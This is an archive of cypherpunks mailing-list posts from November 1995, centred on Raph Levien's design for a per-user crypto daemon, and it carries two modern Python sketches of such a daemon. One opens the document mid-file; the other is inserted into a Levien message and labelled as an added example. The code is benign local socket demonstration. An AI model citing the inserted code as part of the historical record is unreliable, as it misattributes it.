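    send({"msg": "offer", "types": sorted(CONVERTERS) + ["message/external-body"]})
    app_accepts = set(recv()["types"])
    while True:
        req = recv()
        if req is None or req["msg"] == "bye":
            break
        obj, result = req["object"], None
        if obj["type"] == "message/external-body":
            entry = EXTERNAL.get(obj["url"])
            if entry is not None:
                # The daemon knows the username, so it asks for the password
                # only and hands the username to the application.
                send({"msg": "auth-required", "need": "password",
                      "username": entry["username"]})
                supplied = (recv() or {}).get("password", "")
                if hmac.compare_digest(supplied.encode(), entry["password"].encode()):
                    result = entry["object"]
        elif obj["type"] in CONVERTERS:
            out_type, convert = CONVERTERS[obj["type"]]
            result = {"type": out_type, "body": convert(obj["body"])}
        # Success hands the object back, but only in a type the app accepts.
        if result is not None and result["type"] in app_accepts:
            send({"msg": "result", "status": "ok", "object": result})
        else:
            send({"msg": "result", "status": "fail"})
    sock.close()


def run_session(password, accepts=("text/plain", "image/ppm")):
    """Play the application's side once and return the daemon's replies."""
    app_sock, daemon_sock = socket.socketpair()  # AF_UNIX pair on Unix
    worker = threading.Thread(target=daemon_side, args=(daemon_sock,))
    worker.start()
    send, recv = channel(app_sock)

    offer = recv()
    send({"msg": "accept", "types": list(accepts)})

    send({"msg": "convert", "object": {"type": "image/fractal", "body": "mandelbrot"}})
    converted = recv()

    send({"msg": "convert", "object": {"type": "message/external-body",
                                        "url": "ftp://ftp.example.org/pub/notes.txt"}})
    challenge = recv()
    # A real application would prompt the user for the password here.
    send({"msg": "auth", "username": challenge["username"], "password": password})
    fetched = recv()

    send({"msg": "bye"})
    worker.join()
    app_sock.close()
    return {"offer": offer, "converted": converted,
            "challenge": challenge, "fetched": fetched}


if __name__ == "__main__":
    for name, reply in run_session("constructed-password").items():
        print(name, "->", reply)
```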




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 18 Nov 1995 12:10:38 +0800
To: John Young <jya@pipeline.com>
Subject: rape in the gulch (was Noyce and Intel)
In-Reply-To: <199511172211.RAA12522@pipe3.nyc.pipeline.com>
Message-ID: <Pine.BSD.3.91.951118034854.20818C-100000@usr6.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



   that's why we call them vulture capitalists.  I know a few who would 
sell their own mother, several times, even after she died. I think Rock, 
Perring, the Davises, and a few more were gentlemen; but, as a group they 
certainly do not deserve much respect after each pact they make with the 
devil.  Once the big banks and insurance funds started supplying the 
underlying capitalization, the whores really moved in and made it what I 
refer to as evil money.

   you don't need to believe the New World Order is calling the shots to 
see where the banks are coming from.

On Fri, 17 Nov 1995, John Young wrote:

> Worth magazine of Dec/Jan has a lubricious article on "The 
> Super Investors of Silicon Valley":
> 
> 
> " 'Rise of the Silicon Patriots,' by Donald Katz. If their egos 
> and paychecks are oversized, so is their impact on the economy 
> and culture. It's not for nothing that California's venture 
> capitalists think they're at the center of the universe."
> 
> 
> It traces some of the mauling by rapacious VC tigers of unwary 
> techno-bambis and gleefully vaunts winner-take-all when the 
> chips are down (multiple puns there) -- commensurate with the 
> flatulent flattering flummoxing of this "financial 
> intelligence" oilslicker.
> 
> 
> For more FFF FinInt organ-grinding the monkeys, see 
> "Downloading Warren Buffet's Brain."
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Daniel 'genius' Charpentier" <drcharpe@hamlet.uncg.edu>
Date: Sat, 18 Nov 1995 18:59:41 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: WRITTEN CODE
Message-ID: <Pine.SOL.3.91.951118052646.7857B-100000@hamlet>
MIME-Version: 1.0
Content-Type: text/plain




  In Raph Levien's

       Subject : Design proposal : crypto-capable generic interface

he mentioned his desire to see more cryptographic program code and
I didn't want to see this initiative die.  I am a newcomer to
cryptography and I know I shouldn't be posting yet but that is
what I thought cypherpunk postings were supposed to be in the first
place ( program code, protocols, and algorithms ).  Please don't
flame me too badly for this message.  I am doing everything I am
supposed to before posting ( reading the FAQ's, the entire
cypherpunk archive, and APPLIED CRYPTOGRAPHY by Bruce Schneier )
but I could not let this slip by.  Let's talk more about the
cryptographic algorithms, program code, and chips than
politics.  


                     I hope this did not upset too many people





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 19 Nov 1995 00:25:08 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Give us your wired, your poor, your HTML hacker, yearning to web , freely (fwd)
Message-ID: <Pine.SUN.3.91.951118080033.10982A-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

S'punks,

Anyone need a job in the Bay Area?  I think a Cypherpunk would be
ideal for this job.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------- Forwarded message ----------
Date: 17 Nov 95 17:29:42 
From: Steve Gibson <Steve_Gibson@bionomics.org>
To: Friends of Bionomics <Friends_of_Bionomics@notes.worldcom.com>
Subject: Give us your wired, your poor, your HTML hacker, yearning to web freely

Dear Friends,

We need help.  

We need a combination web-cultivator, researcher, editor, conference assistant 
and Notes/Mac wizard.  In sum, a typical entrepreneurial utility infielder.  

Finding people who comfortably straddle the worlds of public policy and high 
technology can be tricky.  We look to you, as someone familiar with The 
Bionomics Institute, for assistance in this key search.  (After all, this one 
hire represents a 33% increase in our staff.) 

If you know of such a person, please get the following information to them, or 
get them in touch with us.

Thanks,
Steve


* * * * * * * * * * * * * * * * * * * * * * * * *
JOB OPENING
* * * * * * * * * * * * * * * * * * * * * * * * *

WHO WE ARE
The Bionomics Institute is a non-profit educational foundation (aka Think Tank) 
dedicated to replacing the conventional mechanistic model of the economy with a 
living, ecosystem one, as described in  Michael Rothschild's book <Bionomics: 
Economy as Ecosystem>.

QUALIFICATIONS
Must be comfortable (1) all over the WWW, and inside the HTML of our web site, 
and (2) researching economics, technology, history, biology, public policy and 
??? using libraries, on-line data sources, phone calls and brainpower, and 3) 
familiar with free-market thinking.

JOB DESCRIPTION
(1) Nurture Institute web site.  (2) Provide primary research support for 
free-market think tank/high-tech columnist.  (3) Maintain research library.  
(4) Assist in general operations of Institute, including conferences, etc.  (5) 
etc. (6) see 5.

ORGANIZATIONAL CULTURE
Informal but intense work environment, self-starters only.  Teamwork and 
communication trite but very necessary.  Technical knowledge must be matched 
with broad interests and strong English skills.  Small staff, medium salary, 
large hours.

IF YOU MADE IT THIS FAR
Do your research on Bionomics (www.bionomics.org would be a good place to 
start), then email resume to Research@bionomics.org.

(November 17, 1995)

Steve Gibson, Executive Director, The Bionomics Institute, 415/454-1000, 
www.bionomics.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 19 Nov 1995 00:59:46 +0800
To: "Daniel 'genius' Charpentier" <cypherpunks@toad.com>
Subject: Re: WRITTEN CODE
Message-ID: <acd34c9c010210049064@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:51 AM 11/18/95, Daniel 'genius' Charpentier wrote:

>I didn't want to see this initiative die.  I am a newcomer to
>cryptography and I know I shouldn't be posting yet but that is
>what I thought cypherpunk postings were supposed to be in the first
>place ( program code, protocols, and algorithms ).  Please don't
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

The list is about several things, some of which overlap the topics
routinely discussed in sci.crypt and sci.crypt.research.

Algorithms, code, etc. _does_ get discussed a lot, as you'll surely see as
you peruse the archives. Volume-wise, it is a drop in the bucket. But this
is not surprising, as primarily mathematical questions and answers tend to
be brief. (You'll see this in the many one-line answers to questions about
cryptographic algorithms....)

Also, technical questions tend to have precise answers, usually with
answers in the various crypto texts and proceedings of the Crypto and
EuroCrypt conferences. And technical questions which _don't_ have simple
answers in the texts tend of course to be _research_ questions, and the
dynamics mitigate against lively discussion until some progress is made.

The social, political, and economic aspects are seldom discussed adequately
elsewhere, and one thing the Cypherpunks group has really led in is the
discussion of digital money, anonymous systems, pseudonyms, reputation,
markets, and a host of other such topics. These topics can border on pure
politics if people are not careful, but are generally close to the topics
discussed at the first meeting over three years ago, before there was even
a mailing list.


>flame me to badly for this message.  I am doing everything I am
>supposed to before posting ( reading the FAQ's, the entire
>cypherpunk archive, and APPLIED CRYPTOGRAPHY by Bruce Schneier )
>but I could not let this slip by.  Let's talk more about the
>cryptographic algorithms, program code, and chips than
>politics.

So, go ahead and talk. I mean this seriously, not sarcastically.

No one will chastise you or anyone else for discussing technical
cryptography. There are obviously folks interested in this. Experts, even.
Published experts, even.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 18 Nov 1995 23:02:54 +0800
To: raph@c2.org (Raph Levien)
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <199511180842.AAA06560@infinity.c2.org>
Message-ID: <199511181441.JAA02040@homeport.org>
MIME-Version: 1.0
Content-Type: text


Raph Levien wrote:

|    I propose that the new interface lives as a sort of daemon, rather
| than a static collection of command line script pieces. A reasonable
| way for applications to talk to the daemon would be Unix domain
| sockets, or whatever the equivalent is on Mac and Windows
| platforms. There should be a simple protocol for automatically
| starting up a daemon if there isn't one already running.

	A daemon per user, or per machine?  Either way, I think you
run into problems on a big multi-user machine.  (Either it's an extra
process or two per person, or it's a great target for attack &
subversion.)

	It's an interesting proposal, but let me ask you this--Why is
it better than a libpgp (or pgp.dll) that offers a variety of services
to programs at multiple levels (ie, offers full one call RSA/IDEA
encryption and compression, as well as ascii armoring, or offers each
of those as a separate function)?




-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 18 Nov 1995 23:05:22 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: CSE gets flak on TV
In-Reply-To: <199511180300.TAA16642@jobe.shell.portal.com>
Message-ID: <199511181446.JAA02056@homeport.org>
MIME-Version: 1.0
Content-Type: text


If you want us to believe you didn't write it, publish a key, and
consistently use it to sign messages.  Incidentally, this also lets us
reliably filter you. :)


| Alice here (the real one) ...
| 
| I think that this "writer" who felt that it was desirable to attach MY
| name to this drivel deserves a good flogging. 


Adam
(Or someone cleverly forging posts in my name.)

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 19 Nov 1995 02:33:36 +0800
To: aba@atlas.ex.ac.uk
Subject: Re: protecting against impersonation (was: CANADIAN PRESS REPORTS)
In-Reply-To: <29172.9511181558@exe.dcs.exeter.ac.uk>
Message-ID: <199511181816.KAA18622@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> This post wasn't signed off, but I presume you are "Alice d'nonymous",
> it would help lots if you could get yourself an account with a nym
> server, such as alpha@c2.org.  That would have the advantages that
> your email address would be recognizable, and that people could reply
> to you if they wanted to.

	it's alpha.c2.org, not alpha@c2.org, btw.

	The added benefit of this is that people could killfile you easily.


> 
> If having a working reply address bothers you, well at least sign your
> posts, if you're concerned about a persistant identity, the tools are
> available to do it.  Complaining about things which have simple
> technological solutions won't get you much sympathy.
> 
> Adam
> 


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sat, 18 Nov 1995 23:56:33 +0800
To: "Daniel 'genius' Charpentier" <drcharpe@hamlet.uncg.edu>
Subject: Re: WRITTEN CODE
In-Reply-To: <Pine.SOL.3.91.951118052646.7857B-100000@hamlet>
Message-ID: <Pine.3.89.9511181002.A4814-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 18 Nov 1995, Daniel 'genius' Charpentier wrote:

> he mentioned his desire to see more cryptographic program code and
> I didn't want to see this initiative die.  I am a new commer to
> cryptography and I know I shouldn't be posting yet but that is

Don't be shy: POST! If you've got good coding ideas, then by all
means we want to hear you. If you've got lousy ideas but good intentions,
the fastest way on the net to get corrected is to post a mistake :-) .
Nobody will flame you for that, so don't be so touchy.

> what I thought cypherpunk postings was supposed to be in the first
> cryptographic algorithms, program code, and chips than
> politics.  

Some of us codewriters are far lazier than others on the list, 
political discussion seems to take less effort and is the lowest common
denominator (too bad, but then I'm guilty; snore...).

>                      I hope this did not upset to many people

Hardly. Don't worry about it, besides, killfiles exist. I agree  
wholeheartedly too, I'd love to see more crypto code and protocol discussion.
I must point out though, that the quality you get is related to the 
quality you give, if you post crypto code/protocol material (I'm too lazy 
for that, right now...), that's what the debate will shift to.
Kind of like "Build it and they will come." (Field of Dreams?).

Curious, where is uncg.edu? Your French name doesn't make me think you're 
in the States (as an .edu address might suggest, but then not necessarily 
either). (univ of Calgary?)

Bonne fin de semaine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 19 Nov 1995 00:54:01 +0800
To: cypherpunks@toad.com
Subject: Re: WRITTEN CODE
In-Reply-To: <Pine.3.89.9511181002.A4814-0100000@tesla.cc.uottawa.ca>
Message-ID: <DHRReD28w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


s1113645@tesla.cc.uottawa.ca writes:
> On Sat, 18 Nov 1995, Daniel 'genius' Charpentier wrote:
>
> > he mentioned his desire to see more cryptographic program code and
> > I didn't want to see this initiative die.  I am a new commer to
> > cryptography and I know I shouldn't be posting yet but that is
>
> Don't be shy: POST! If you've got good coding ideas, then by all
> means we want to hear you. If you've got lousy ideas but good intentions,

Amen. If you have something crypto-relevant to post, please do. As the amount
of noise on this list rises, the meaningful discussion goes away. Please help
reverse this trend.

> the fastest way on the net to get corrected is to post a mistake :-) .
> Nobody will flame you for that, so don't be so touchy.

Or if some anal-retentive jerk flames you, ignore him. Even if you make a naive
mistake in your post, and someone corrects it, both you and probably other
readers of this list will learn from it.

> Bonne fin de semaine.

Curious how in qc they say 'fin de semaine' while in France proper everybody
says 'weekend'.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Sun, 19 Nov 1995 03:14:13 +0800
To: cypherpunks@toad.com
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <199511181441.JAA02040@homeport.org>
Message-ID: <199511181856.KAA24071@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack wrote:
> A daemon per user, or per machine? Either way, I think you
> run into problems on a big multi-user machine. (Either its an extra
> process or two per person, or its a great target for attack &
> subversion.

One per user. I'm thinking that, most of the time, the daemon process
would only last as long as the application.

It is certainly true that if there were to be one daemon per machine,
the security requirements would be a lot greater, as it would no
longer be possible to rely on the operating system to get the file
permissions right, etc. On the other hand, the daemon process better
be done right, or you're in trouble anyway.

> Its an interesting proposal, but let me ask you this--Why is
> it better than a libpgp (or pgp.dll) that offers a variety of services
> to programs at multiple levels (ie, offers full one call RSA/IDEA
> encryption and compression, as well as ascii armoring, or offers each
> of those as a seperate function.

   Exportability. There is a general feeling that a mailer program
with specific hooks to libpgp is going to have trouble with
exportability (and forget about binaries), where a program that
supports a generic interface (the likes of .mailcap) is out of the
NSA's jurisdiction. Of course, this is speculation until we actually
get a ruling, but it sounds plausible enough to me to warrant spending
some time on design and implementation.

   Your question brings up another point: if the daemon process is
going to run as the personal slave of the application, then why not a
dynamic library instead? Two reasons. First, on Unix anyway,
interprocess communication through domain sockets is a more mature,
robust, and portable technology than dynamically linked libraries. On
Windows, it's probably the other way around, and that's worth thinking
about.
   The real reason is, though, that the daemon and application should
naturally be distrustful of each other's address spaces. Can you see
Netscape shipping code that links in a Joe Random dll? Conversely, do
you want your PGP secret data structures sharing an address space with
one of Netscape's beta releases? Using two processes in two address
spaces solves this problem.

   Jeff, if you're reading this, what do you think Netscape's chances
are for supporting such a protocol, assuming of course that there were
nicely implemented daemons, and that the protocol itself was going to
standards track? Is it something you'd be interested in?

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 19 Nov 1995 00:54:16 +0800
To: cypherpunks@toad.com
Subject: Oracle's "internet terminal"
Message-ID: <TRRReD29w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


The recent issue of _Computer Reseller News_ has a couple of items on the
"internet terminal" being readied by Oracle. I'll quote a couple of
crypto-relevant excerpts:

1. Interview with Larry Ellison (Oracle Corp's Chairman/CEO)

Q. How far along are you in the development of the $500 Internet Network
Terminal?

A. We'll be delivering the prototype machines this year with full production in
the third quarter next year.

...

Q. Will you release Application Programming Interfaces for the Oracle browser
and server?

A. We will use industry-standard APIs that are accepted by everybody, not
Microsoft-proposed APIs.

...

Q. What differentiates the Oracle Web products from competitive offerings in
terms of pricing and technology?

A. There will be standard Web payment schemes. We'll use them, as will
everybody else. We won't differentiate ourselves on basic payment schemes. The
thing that will differentiate us is security protocols, the ability to use text
processing, database processing, video processing, our video server technology
and our powerful client.


2. Ellison's field of dreams - $500 PC (by Ken Yamada)

... Oracle's chairman and chief executive, Lawrence Ellison, previewing his
latest futuristic vision at a trade show last month in Geneva, said Oracle is
developing the computer and that it will be shown early next year. The desktop
version of the new system, called a "network computer" and referred to as an
"NC" rather than a PC, is expected to sell for about $500 and will use Internet
servers to do the bulk of its computing. Basic hardware will include an
inexpensive microprocessor, a small amount of memory, a monitor and a keyboard,
but the device will lack storage and software. [I guess, they mean no permanent
storage or software other than the browser in ROM. No remembered state, no
viruses... -DV]

... The Redwood Shores, Calif., company is developing the computer's operating
system and technical design, but the unit will be produced by hardware
manufacturers, said Farzad Dibachi, an Oracle senior vice president. While
Dibachi would not name specific manufacturers, he explained that Oracle's
participation in the device's technical development was similar to the role it
played in developing a digital television set-top box with Apple Computer,
which produced the box's hardware. ... Oracle plans to sell software that turns
World Wide Web sites essentially into central processing units for the new
computers. ...

"If computing is to go to the masses and we're doing electronic commerce," said
Dibachi in a telephone interview from Geneva, "you have to have devices that
are simpler."

Oracle's Laursen said he expects that eventually many different companies will
manufacture the devices, which he described as an entire line of products
encompassing two-way pagers, intelligent telephones, mobile computers, desktop
systems and television set-top boxes. Each of these devices would rely on the
Internet to do its core processing work. He said he expected Oracle to develop
as many as 50 working prototypes by early next year.

... Oracle also plans to leverage its wireless communications software products
and give some of the devices wireless capabilities. "We're still trying to
figure out what processor to put in," Laursen said. Under consideration are
chips from Mips Technologies and Motorola Inc.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 19 Nov 1995 03:25:15 +0800
To: cypherpunks@toad.com
Subject: Re: ZD Net Update v.1 #2
Message-ID: <acd36fae03021004cda7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:11 PM 11/18/95, ZD Net / World Wide Web Edition wrote:
>__________________________________ZD Net Update_______________________________
>v. 1 #2                                                               11-13-95
>
>Welcome to ZD Net Update, the free E-mail newsletter created especially for
>registered users of Ziff-Davis Interactive's ZD Net/World Wide Web edition.
>ZD Net Update is a bi-weekly bulletin that alerts you to new and exciting
>developments on ZD Net.


(rest of long newsletter deleted....)

Ah, someone has once again subscribed the Cypherpunks list to a newsletter.

Will the person who did this please have the decency to reverse this
situation? (There are instructions at the end, but the syntax of the
"unsubscribe" command may imply that only the site from which the subscribe
was initiated can unsub. Whoever subscribed us can unsub us.)

Do I have to point out that just a single one of these long newsletters
takes up more list bandwidth than most of the putatively "off-topic" posts
do?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Sun, 19 Nov 1995 03:43:15 +0800
To: cypherpunks@toad.com
Subject: Re: Design proposal: crypto-capable generic interface
In-Reply-To: <Pine.BSD.3.91.951118163828.463A-100000@usr3.primenet.com>
Message-ID: <199511181926.LAA26947@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


atilla brings up many good points, including:
> one of the biggest problems with _any_ crypto system, and pgp is 
> no exception, is tmp files, followed closely by insecure memory.
> insecure memory is a separate issue, but some of the temporary file
> problems can be relegated to reduced risk by passing the daemon the
> user's preferred location for tmp file --for instance, [...]

   An even better solution is to design the cryptosystem so that it
doesn't _need_ temp files in the first place. MOSS wins, PGP loses. I
don't know enough about S/MIME to say.

   In a related vein, Darren New <dnew@sgf.fv.com> sent me a pointer
to First Virtual's SMXP (Simple Mime eXchange Protocol). This is a
cool protocol that does about 50% of what I'm talking about. If you're
interested, here it is:
      ftp://ftp.fv.com/pub/docs/smxp-spec.{ps,txt}

   In order to adapt SMXP into something that's useful for what I've
proposed, numerous changes would need to be made:

* Unix Domain Sockets instead of TCP

* Add negotiation

* Add authentication

   Without these three changes, the system is nearly useless for
crypto. Further, there are two "aesthetic" points I'd like to see
cleaned up given the chance. First, SMXP makes the "ASCII assumption."
Since the daemon and app will be tightly coupled, definitely running
on the same machine, there is no reason to exclude binary MIME
objects. On the other hand, as far as I know, all of the MIME crypto
protocols are ASCII based (somebody please correct me if S/MIME is the
exception).
   Second, in order to support operation without temp files, it's
necessary to interleave the operations of transferring the object from
the app to the daemon and vice versa. I have a proposal for a
lower-level spec which can handle this quite readily, if anyone is
interested.

   Unfortunately, the proposal doesn't look much like SMXP. However,
the possibility of creating a prototype based on SMXP is intriguing.

Raph

P.S. Did anyone see the mention of the perl/RSA CJR in the latest
Wired? Managed to get the attribution wrong. Still no response.
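
[Added example, not part of Raph Levien's messages and not SMXP or PGP code: a Python sketch of the per-user daemon discussed in this thread, covering both the reliance on operating-system permissions from the earlier message and the three changes listed above (Unix domain socket, negotiation, authentication), with chunks interleaved so that no temp file is needed. Assumptions: Linux (SO_PEERCRED), the length-prefixed framing, the operation name "armor" and all function names are hypothetical, and base64 stands in for a real crypto operation.]

```python
import base64
import os
import socket
import struct
import tempfile
import threading

CHUNK = 3072            # multiple of 3, so per-chunk base64 output concatenates cleanly
SUPPORTED = ("armor",)  # hypothetical operation name; base64 stands in for real crypto

def recv_exact(conn, n):
    """Read exactly n bytes or fail; recv() may return short reads."""
    buf = b""
    while len(buf) < n:
        part = conn.recv(n - len(buf))
        if not part:
            raise ConnectionError("peer closed mid-frame")
        buf += part
    return buf

def send_frame(conn, data):
    """Binary-safe framing: 4-byte big-endian length, then the payload."""
    conn.sendall(struct.pack("!I", len(data)) + data)

def recv_frame(conn):
    (length,) = struct.unpack("!I", recv_exact(conn, 4))
    return recv_exact(conn, length)

def peer_uid(conn):
    """Kernel-reported uid of the connected peer (Linux SO_PEERCRED: pid, uid, gid)."""
    raw = conn.getsockopt(socket.SOL_SOCKET, socket.SO_PEERCRED, struct.calcsize("3i"))
    return struct.unpack("3i", raw)[1]

def listen_private():
    """Bind the socket inside a fresh directory that mkdtemp creates with mode 0700."""
    directory = tempfile.mkdtemp(prefix="cryptod-")
    path = os.path.join(directory, "sock")
    srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    srv.bind(path)
    srv.listen(1)
    return srv, path

def serve_one(srv, allowed_uid):
    """Daemon side: authenticate the peer, negotiate, then transform chunk by chunk."""
    conn, _ = srv.accept()
    with conn:
        offered = recv_frame(conn).decode().split(",")
        if peer_uid(conn) != allowed_uid:
            send_frame(conn, b"ERR unauthorized uid")
            return
        op = next((o for o in offered if o in SUPPORTED), None)
        if op is None:
            send_frame(conn, b"ERR no common operation")
            return
        send_frame(conn, b"OK " + op.encode())
        while True:
            chunk = recv_frame(conn)
            if not chunk:          # empty frame marks end of object
                break
            send_frame(conn, base64.b64encode(chunk))

def armor_via_daemon(path, data, offer=("sign", "armor")):
    """Application side: offer operations, then interleave sending and receiving."""
    out = []
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as c:
        c.connect(path)
        send_frame(c, ",".join(offer).encode())
        reply = recv_frame(c).decode()
        if not reply.startswith("OK "):
            raise PermissionError(reply)
        for i in range(0, len(data), CHUNK):
            send_frame(c, data[i:i + CHUNK])
            out.append(recv_frame(c))   # result returns before the next chunk goes out
        send_frame(c, b"")
    return b"".join(out)

def demo(data, allowed_uid=None, offer=("sign", "armor")):
    """Run one daemon thread and one client exchange over a private socket."""
    srv, path = listen_private()
    uid = os.getuid() if allowed_uid is None else allowed_uid
    worker = threading.Thread(target=serve_one, args=(srv, uid), daemon=True)
    worker.start()
    try:
        return armor_via_daemon(path, data, offer)
    finally:
        worker.join(timeout=5)
        srv.close()
        os.unlink(path)
        os.rmdir(os.path.dirname(path))

if __name__ == "__main__":
    sample = bytes(range(256)) * 40     # constructed binary input, 10240 bytes
    print(demo(sample) == base64.b64encode(sample))
```

[The uid check uses the kernel's view of the peer rather than anything the application claims, and the length-prefixed frames carry arbitrary binary data, so the "ASCII assumption" is not needed on the local link.]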




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wiltship@iccu6.ipswich.gil.com.au (PeterWiltshire)
Date: Sat, 18 Nov 1995 10:11:54 +0800
To: cypherpunks@toad.com
Subject: Re: credit card conventional wisdom
Message-ID: <199511180157.MAA13155@iccu6.ipswich.gil.com.au>
MIME-Version: 1.0
Content-Type: text/plain


You wrote...
>While not as familiar with the US system as the Canadian, I can give as a
>simple example, the bank clearing system for paper checks.  In Canada, we
>can clear a check from one side of the country to the other overnight.  We
>have 24 hour clearing.  While this is far from "perfect", our existing
>paper systems allow for a degree of efficiency which I don't believe is
>engineered into the US clearing system. 

Here in Australia most banks take 5 working days to clear a cheque.. even if
it's deposited at a bank just up the road from drawer's bank.

cheers

Peter







                                             Flight to Quality
                                 Wiltshire Productions Pty Ltd
                              Brisbane, Queensland, Australia
               Intl Voice  61 7 3376 3535  Intl Fax  61 7 3279 4027
              Email wiltship@gil.com.au  PGP Key ID 3E584C7D
  PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sun, 19 Nov 1995 04:30:18 +0800
To: cypherpunks@toad.com
Subject: Re: Request for URL'S
Message-ID: <acd3e86c040210041c67@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 7:31 PM 11/6/95, Censored Girls Anonymous wrote:
....
>I'd love to make a Cypherpunk URL page,
>so if you will send your five favorite URL's
>I'll put them all on a page like The Dreams Page,
>(http:www.primenet.com/~carolab/dreams.html)
>and turn it loose on the net.

The following seems to be a pretty good nexus:
http://www.quadralay.com/www/Crypt/Crypt.html

There is, of course
http://www.oberlin.edu/~brchkind/cyphernomicon/

A crypto legal centre:
http://www.kub.nl:2080/FRW/CRI/projects/bjk/lawsurvy.htm

Happy Hunting






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wwwziff@internet.com (ZD Net / World Wide Web Edition)
Date: Sun, 19 Nov 1995 02:17:22 +0800
To: wwwedition@ziff.com
Subject: ZD Net Update v.1 #2
Message-ID: <199511181755.MAA22495@yipee.internet.com>
MIME-Version: 1.0
Content-Type: text/plain


__________________________________ZD Net Update_______________________________
v. 1 #2                                                               11-13-95

Welcome to ZD Net Update, the free E-mail newsletter created especially for
registered users of Ziff-Davis Interactive's ZD Net/World Wide Web edition. 
ZD Net Update is a bi-weekly bulletin that alerts you to new and exciting
developments on ZD Net.

In this issue:

> ZD NET COMDEX/FALL '95 COVERAGE KICKS OFF
> ZIFF-DAVIS PREMIERES ZD INTERNET LIFE ON THE WORLD WIDE WEB
> TRUE INTERACTIVE REALITY ARRIVES ON ZD NET
> ANNOUNCING SNAP SOLUTIONS TO COMPLEX PROBLEMS
> MEASURE THE HEALTH OF THE NET WITH THE INTERNET INDEX

*     *     *     *     *     *     *     *     *     *

ZD NET COMDEX/FALL '95 COVERAGE KICKS OFF

Comdex/Fall: It's been called the Greatest Show on Earth, and for good reason.
All this week the ZD Net Special Report

      http://www.zdnet.com/~zdi/comdex/filters/main.html

will provide continuous updates from the trade show, complete with daily news
updates, expert commentary, and Live Chats. Follow PC Magazine's Technical
Excellence Awards, cybercast as a virtual 3D world. Get the skinny from PC
Week's Spencer F. Katt party. And learn all about the new products that have
attendees buzzing. For all the sights and sounds of the show, ZD Net is the
place to be.


